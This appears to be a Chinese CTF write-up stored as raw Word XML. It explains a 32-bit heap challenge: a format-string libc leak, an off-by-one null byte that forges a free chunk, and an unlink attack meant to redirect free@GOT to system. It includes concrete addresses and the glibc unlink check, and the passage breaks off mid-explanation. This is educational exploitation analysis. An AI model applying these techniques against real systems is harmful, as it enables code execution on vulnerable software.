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81wgtv1501742167909" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>一、题目描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="76akdc1501742169347" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="5239748"/>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5239748"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="12racm1501742169347" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="98ncsv1501742169347" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>二、漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="98hwbl1501742169347" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>1、在input_name()函数中，存在格式化字符串漏洞，可以用于泄露so库基址，因此得到system函数的地址</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="38qhau1501742169347" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="2889133"/>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267325" cy="2889133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="33txda1501742169347" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="60wjns1501742169347" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>2、知识点一：堆分配</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="72myur1501742169347" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>    堆分配的大小会自动填充到最接近的2的n次幂，如要求分配124字节，系统会分配128字节，其中包括前8字节固定的堆结构，后面的120字节才是用户真正合法的数据写入区，如果用户写入的数据超过了120字节，则视为堆溢出（此处有疑问？？？）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="98rksd1501742169347" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="74huti1501742169347" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>3、知识点二：32bit下堆结构</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="9guta1501742169347" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>使用中的堆块：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single"/>
          <w:left w:val="single"/>
          <w:bottom w:val="single"/>
          <w:right w:val="single"/>
          <w:insideH w:val="single"/>
          <w:insideV w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3020"/>
        <w:gridCol w:w="5320"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节 pre_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>前一块大小（前一块若是空闲，则pre_size=前一块大小；前一块若是被分配状态，则pre_size是前一块的最后4字节内容）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1660"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节 size &amp; pre_flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>本块大小，因为本块大小肯定是8的整数倍，所以后三位一定会空闲出来作为三个flag（最低位:指示前一个chunk是否正在使用;倒数第二位:指示这个chunk是否是通过mmap方式产生的;倒数第三位:这个chunk是否属于一个线程的arena）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3020"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>（堆长度-8）字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>用户合法使用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="46yrgx1501742169347" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="89fepv1501742169347" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>空闲列表中的堆块：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single"/>
          <w:left w:val="single"/>
          <w:bottom w:val="single"/>
          <w:right w:val="single"/>
          <w:insideH w:val="single"/>
          <w:insideV w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3040"/>
        <w:gridCol w:w="5320"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3040"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节 pre_size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>pre_size = 上一个空闲块大小</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3040"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节 size &amp; pre_flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>size = 本块大小，pre_flag = 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3040"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>前向指针fd</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3040"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>4字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>后向指针bk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3040"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
              <w:t>（堆长度-16）字节</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5320"/>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="74ldgk1501742169347" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="31gvug1501742169347" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>    need_chunk_SIZE_1()，need_chunk_SIZE_2()函数  分别是申请124和248个字节的堆空间，实际系统将分配128和256字节。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="79pjdv1501742169347" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>    edit_chunk()函数分别可以对堆块进行编辑，分别可以往堆块中写入124和248字节的数据。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="94aemm1501742169347" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="389081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5267325" cy="3890819"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="43ljqb1501742169347" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>    漏洞出现在：堆块一系统实际分配128字节，实际上合法的可供用户写入的只有128-8=120字节，edit_chunk函数允许用户往堆块1中写入124字节，刚好可以覆盖堆块二结构的前4个字节，同时scanf函数自动会在末尾加上 \x00，正好修改堆块二第二个4字节中 的 pre_flag从1变为0，导致出现堆块1是空闲块的假象，由于128字节的堆块为0x80，所以'\x00'会直接将其覆盖，因此第二个块必须申请256字节的，即0x100。当释放堆块二时，系统检查到堆块二的前一块（即堆块一）是空闲的，因此会将其当做是在空闲列表中的块，将其解链，执行unlink操作。如果在堆块一中事先精心布置好数据，利用unlink就达到任意内存写。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="43fcdu1501742169347" w:id="20"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="21cfmd1501742169347" w:id="21"/>
      <w:bookmarkEnd w:id="21"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>三、漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="56yaon1501742169347" w:id="22"/>
      <w:bookmarkEnd w:id="22"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>1、格式化字符串</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="71kend1501742169347" w:id="23"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="2785853"/>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267325" cy="2785853"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="23yqmp1501742169347" w:id="24"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>可以输出栈上0xffffcfec里面的内容，从而可以泄露__libc_start_main的地址，从而根据so库里的偏移，计算出system函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="14dmwt1501742169347" w:id="25"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="72gkgv1501742169347" w:id="26"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>2、首先执行 need_chunk_SIZE_1()，need_chunk_SIZE_2()，need_chunk_SIZE_1(），分配三块内存</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="37asab1501742169347" w:id="27"/>
      <w:bookmarkEnd w:id="27"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="3072606"/>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3072606"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="41qbku1501742169347" w:id="28"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>    每次malloc（）函数分配结束后，返回堆块起始位置到 $EAX。下一条指令，是将堆块的起始地址记录到堆表中。通过计算知道堆表启示地址为：0x804a0a0 。当分配完三块内存时，查看堆表，挨个记录了三个堆块的起始位置。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="54clzu1501742169347" w:id="29"/>
      <w:bookmarkEnd w:id="29"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>3、往第三个堆块上写入 /bin/sh ，为最后调用system做好准备</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="71ffzn1501742169347" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>4、往第一个堆块上写入124字节，从而覆盖了第二个块指示上一块是否空闲的标志位为0，所以在free第二个块的时候，会认为</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="62cjqr1501742169347" w:id="31"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>第一个块是空闲块，从而对其采用unlink操作。现在的想法就是通过dword shoot对4字节内存任意写，修改0x804a0a0处四字节的内容为一个小于0x804a0a的地址，从而在调用edit_chunk函数的时候可以对其任意写，将其修改为free_got的地址，从而再调用edit_chunk函数的时候可以将free_got地址里的内容修改成system函数的地址。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="81qbpr1501742169347" w:id="32"/>
      <w:bookmarkEnd w:id="32"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>5、释放第二块，根据此时内存数据，如下图，判断第二块前一块为空闲块，因此对第一块执行unlink操作（目的是改变堆表0x804a0a0的值）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="82sapp1501742169347" w:id="33"/>
      <w:bookmarkEnd w:id="33"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="30344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303444"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="58mqkb1501742169347" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="3830228"/>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3830228"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="13rfjh1501742169347" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>BK = p -&gt;bk = 0x804a098 = 0x804a0a0 - 0x8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="32bunl1501742169347" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>FD = p -&gt;fd =  0x804a094 = 0x804a0a0 - 0xc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="47dfcw1501742169347" w:id="37"/>
      <w:bookmarkEnd w:id="37"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>*（FD-&gt;bk） = BK   即   *0x804a0a0 =   0x804a0a0 - 0x8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="28lwdm1501742169347" w:id="38"/>
      <w:bookmarkEnd w:id="38"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>*（BK -&gt;fd） = FD   即   *0x804a0a0 =   0x804a0a0 - 0xc </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="11paqe1501742169347" w:id="39"/>
      <w:bookmarkEnd w:id="39"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>最终结果就是将堆管表首地址内容改写为 0x804a0a0 - 0xc = 0x804a094</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="80gxla1501742169347" w:id="40"/>
      <w:bookmarkEnd w:id="40"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>但实际上却失败，报如下错误：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:name="34xbws1501742169347" w:id="41"/>
      <w:bookmarkEnd w:id="41"/>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="5267325" cy="1416865"/>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67325" cy="1416865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="38txqr1501742169347" w:id="42"/>
      <w:bookmarkEnd w:id="42"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>为啥？看一下unlink函数的源码就清楚了</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single"/>
          <w:left w:val="single"/>
          <w:bottom w:val="single"/>
          <w:right w:val="single"/>
          <w:insideH w:val="single"/>
          <w:insideV w:val="single"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1060"/>
        <w:gridCol w:w="14440"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="600"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1060"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="afafaf"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14440"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:color w:val="333333"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>#define unlink(AV, P, BK, FD) {
 FD = P-&gt;fd;
 BK = P-&gt;bk;
 if (__builtin_expect (FD-&gt;bk != P || BK-&gt;fd != P, 0))
 malloc_printerr (check_action, "corrupted double-linked list", P, AV);
 else {
 FD-&gt;bk = BK;
 BK-&gt;fd = FD;
// if (!in_smallbin_range (P-&gt;size)
// &amp;&amp; __builtin_expect (P-&gt;fd_nextsize != NULL, 0)) {
// if (__builtin_expect (P-&gt;fd_nextsize-&gt;bk_nextsize != P, 0)
// || __builtin_expect (P-&gt;bk_nextsize-&gt;fd_nextsize != P, 0))
// malloc_printerr (check_action,
// "corrupted double-linked list (not small)",
// P, AV);
// if (FD-&gt;fd_nextsize == NULL) {
// if (P-&gt;fd_nextsize == P)
// FD-&gt;fd_nextsize = FD-&gt;bk_nextsize = FD;
// else {
// FD-&gt;fd_nextsize = P-&gt;fd_nextsize;
// FD-&gt;bk_nextsize = P-&gt;bk_nextsize;
// P-&gt;fd_nextsize-&gt;bk_nextsize = FD;
// P-&gt;bk_nextsize-&gt;fd_nextsize = FD;
// }
// } else {
// P-&gt;fd_nextsize-&gt;bk_nextsize = P-&gt;bk_nextsize;
// P-&gt;bk_nextsize-&gt;fd_nextsize = P-&gt;fd_nextsize;
// }
// }
 }
}
//当然很多的代码其实是在当内存块的大小过大的时候才会执行的代码
//就是被注释掉的那一部分，在内存块不大的情况下不需要关心</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="87csrc1501742169347" w:id="43"/>
      <w:bookmarkEnd w:id="43"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>看第4行的if语句就明白了，想对内存堆正确释放，必须得过了这个判断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="41fsge1501742169347" w:id="44"/>
      <w:bookmarkEnd w:id="44"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>在这里，FD=0x804a094，BK=0x804a098，</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="39rvxz1501742169347" w:id="45"/>
      <w:bookmarkEnd w:id="45"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>FD-&gt;bk=0x804a094+0xc=0x804a0a0，BK-&gt;fd=0x804a098+0x8=0x804a0a0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="44gymo1501742169347" w:id="46"/>
      <w:bookmarkEnd w:id="46"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>而P的值为0x846b000（存储FD的地址为0x846b008）,由于0x804a0a0地址存储的值是0x846b008，所以这个判断绕不过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:name="51jzmb1501742169347" w:id="47"/>
      <w:bookmarkEnd w:id="47"/>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>为了让P的值为0x846b008，我们可以通过精心构造数据，伪造第一个块的大小为0x78。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/>
      <w:bookmarkStart w:name="78higl1501742169347" w:id="48"/>
